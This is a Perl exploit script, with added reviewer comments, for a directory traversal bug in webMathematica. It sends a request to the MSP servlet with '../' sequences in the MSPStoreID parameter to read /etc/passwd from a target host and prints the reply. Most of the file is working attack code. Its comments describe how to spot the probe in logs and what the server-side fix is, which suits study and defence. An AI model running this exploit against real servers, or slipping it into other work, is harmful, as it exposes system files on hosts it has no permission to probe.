#!/usr/bin/perl
# Author: ntfx <root@legion2000.security.nu>
# legion2000SR http://legion2000.security.nu
# Directory traversal bug in webMathematica
# Shows the passwd file or other system files on Unix.
# Shows full path disclosure on NT; possible system file exposure.
# greet: il, opt1k, kat, spy
###

use IO::Socket;
use strict;

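# Argument gate: both <host> and <port> are required before any socket work.
# Counting the arguments (instead of testing the truth of $ARGV[0]) also
# catches a missing port, which would otherwise reach sockaddr_in() as undef,
# and no longer rejects a host argument that happens to be the string "0".
if (@ARGV < 2) {
    usage();
    exit;    # not reached in practice: usage() ends the program itself
}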

# Print the invocation help together with the author/advisory banner, then
# end the program with exit status 0. Control never returns to the caller.
sub usage() {
    my @banner = (
        "USAGE: perl $0 <host> <port>\n",
        "Author: ntfx ntfx\@kernel.net\n",
        "webMathematica Directory Transversal bug\n",
        "Legion2000SR http://legion2000.security.nu\n",
    );
    print @banner;
    exit(0);
}

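# Main flow: open one TCP connection to <host>:<port>, send a single fixed
# request against the webMathematica MSP servlet, and print the raw reply.
#
# Reviewer notes (defensive reading):
#   * The request puts "../" sequences in the MSPStoreID query parameter.
#     In web-server access logs the probe is recognisable by that parameter
#     carrying path separators or dot-dot segments.
#   * The server-side fix is to reject MSPStoreID values that contain path
#     components; whether a given install does so has to be confirmed on
#     that install - nothing in this script verifies it.
my $host = $ARGV[0];
my $port = $ARGV[1];

# Fail early with a clear message instead of handing undef or junk to
# sockaddr_in().
die "port must be a number between 1 and 65535\n"
    unless defined $port
        && $port =~ /\A\d+\z/
        && $port >= 1
        && $port <= 65535;

# inet_aton() returns undef when the name cannot be resolved; the original
# passed that straight on to sockaddr_in().
my $packed_ip = inet_aton($host)
    or die "cannot resolve host '$host'\n";
my $peer  = sockaddr_in($port, $packed_ip);
my $proto = getprotobyname('tcp');

# Every socket call is checked so that a refused or unreachable service is
# reported as such rather than looking like an empty server reply.
socket(my $sock, PF_INET, SOCK_STREAM, $proto)
    or die "socket: $!\n";
connect($sock, $peer)
    or die "connect to $host:$port failed: $!\n";
print "\n now getting the passwd file\n\n";

# Bare request line with no HTTP version and no headers, terminated by an
# empty line. The target path is fixed; it is not taken from user input.
my $submit = "GET /webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=text\n\n";
defined send($sock, $submit, 0)
    or die "send: $!\n";

# Read until the server closes the connection.
my @passwd = <$sock>;
close($sock);

warn "no data received from $host:$port\n" unless @passwd;
print @passwd;

# NOTE(review): this line is printed unconditionally. It does not confirm
# that file contents came back - an error page or an empty reply produces
# the same closing message, so the output above has to be read to judge.
print "\npasswd file should now be shown\n\n";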
